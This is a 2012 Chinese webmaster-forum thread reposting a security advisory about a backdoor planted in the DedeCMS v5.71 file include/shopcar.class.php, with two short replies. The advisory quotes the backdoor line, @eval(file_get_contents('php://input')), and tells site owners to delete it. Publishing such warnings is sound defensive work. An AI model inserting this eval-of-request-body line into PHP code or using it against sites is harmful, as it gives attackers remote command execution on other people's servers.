源码论坛公告:本站是一个交流学习建站资源的社区论坛,旨在交流学习源码脚本等资源技术,欢迎大家投稿发言! 【点击此处将锦尚放在桌面

源码论坛,商业源码下载,尽在锦尚中国商业源码论坛

 找回密码
 会员注册

QQ登录

只需一步,快速开始

查看: 7226|回复: 2
打印 上一主题 下一主题

[织梦教程] 织梦(DedeCMS)v5.71后门远程代码执行漏洞 提醒广大站长注意

[复制链接]

1273

主题

5313

帖子

534万

金币

管理员

锦尚中国站长

Rank: 9Rank: 9Rank: 9

积分
10740299
QQ
跳转到指定楼层
1#
发表于 2012-3-30 17:59:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
DEDECMS是织梦内容管理系统,国内一款基于PHP+MySQL的技术开发的,支持多种服务器平台的PHP网站内容管理系统。

DedeCMS某些版本/include/shopcar.class.php文件中,被添加后门代码,远程未验证的攻击者利用该后门可以执行任意命令。


临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

*直接找到站点include目录下shopcar.class.php文件,去掉里面的代码
@eval(file_get_contents('php://input'));即可。

分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏 分享分享
锦尚数据推出国内BGP机房 无需备案+备案期间依然可以访问!

锦尚数据 | 源码论坛 | 站长数据 | 站长圈 | 自助服务 | 安全频道 | 云数据

0

主题

64

帖子

16

金币

初级会员

Rank: 1

积分
97
2#
发表于 2012-4-10 16:37:11 | 只看该作者
为了不扰乱会员对源码的测试,有问题咨询右侧客服不要直接回复,否则视为非法信息屏蔽会员ID!
做个记号,下次好找!












www.mdwjc.com   玉米秸秆收割机

4

主题

738

帖子

100

金币

初级会员

Rank: 1

积分
757
3#
发表于 2012-5-20 22:00:34 | 只看该作者
为了不扰乱会员对源码的测试,有问题咨询右侧客服不要直接回复,否则视为非法信息屏蔽会员ID!
漏洞真多啊
您需要登录后才可以回帖 登录 | 会员注册

本版积分规则

锦尚中国源码论坛

聚合标签|锦尚中国,为中国网站设计添动力 ( 鲁ICP备09033200号 ) |网站地图

GMT+8, 2024-11-14 14:44 , Processed in 0.165461 second(s), 26 queries .

带宽由 锦尚数据 提供 专业的数据中心

© 锦尚中国源码论坛 52jscn Inc. 非法入侵必将受到法律制裁 法律顾问:IT法律网 & 褚福省律师 锦尚爱心 版权申诉 版权与免责声明